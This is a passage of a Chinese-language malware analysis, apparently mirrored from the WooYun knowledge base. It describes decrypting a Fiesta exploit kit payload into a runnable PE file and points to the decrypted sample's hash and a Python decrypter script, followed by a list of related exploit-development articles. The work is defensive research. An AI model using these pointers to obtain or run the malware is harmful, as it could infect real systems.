解密這個payload,我們可以跳過前16位元組,解密出來的資料多了25位元組,25位元組之後就是正常的MZ頭,我們找到了有效的PE。那麼這裡有什麼呢?更多的資訊需要把檔案放在系統上,MZ頭之前的資料是檔案大小,硬碟上的檔名:
透過這些資訊,我們得到一個可以執行的PE檔案,解密的樣本可以從這裡下載:31af1a5656ce741889984e8e878c7836
我寫了一個可以從網路資料中解密任何Fiesta payload的Python指令碼,已經在最近10個Fiesta EK上測試過了,兩個引數,第一個是需要解密檔案,第二個是輸出檔案,將會輸出有效的PE檔案:
https://github.com/0x3a/tools/blob/master/fiesta-payload-decrypter.py
本文章來源於烏雲知識庫,此映象為了方便大家學習研究,文章版權歸烏雲知識庫!
相關文章
- Exploit開發系列教程-Heap
- Exploit開發系列教程-Windbg
- Metaphor-A real life Stagefright exploit
- 探究 Text Kit 和 Core Text 的前世今生 (Text Kit 篇)
- 上新啦!KIT!
- 上新啦KIT
- Exploit開發系列教程-Mona 2& SEH
- ctf pwn中的unlink exploit(堆利用)
- Sprite Kit教程:初學者
- How to Exploit libphp7.0.so in Apache2PHPApache
- TThread深入分析thread
- “偽萬年曆” Root Exploit惡意應用分析
- JavaScript1/30: Drum KitJavaScript
- go-kit微服務:限流Go微服務
- 分享一個React-kitReact
- React Starter Kit 中文文件React
- 常用Sprite Kit外掛整理
- 深入分析 Golang 的 ErrorGolangError
- Android動畫深入分析Android動畫
- 深入分析Session和CookieSessionCookie
- SPI機制深入分析
- Python MetaClass深入分析Python
- 深入分析C++引用C++
- 深入分析 Hello World 程式
- 深入分析 Docker 映象原理Docker
- Exploit開發系列教程-Exploitme2 (Stack cookies & SEH)Cookie
- Smashing The Browser:From Vulnerability Discovery To Exploit學習記錄
- Flash 獨佔 Exploit Kits 被利用漏洞前八席
- go-kit 微服務實踐Go微服務
- go-kit微服務:HTTP RESTGo微服務HTTPREST
- 【java學習】JDK(Java Development Kit)JavaJDKdev
- JavaScript30 - 1.Drum KitJavaScript
- Houdini Development Kit ( HDK ) VC小記dev
- Beans Development Kit (BDK)分析(四) (轉)Beandev
- Beans Development Kit (BDK)分析(五) (轉)Beandev
- Beans Development Kit (BDK)分析(六) (轉)Beandev
- Nuxt Kit API :路徑解析工具UXAPI
- Nuxt Kit 中的模板處理UX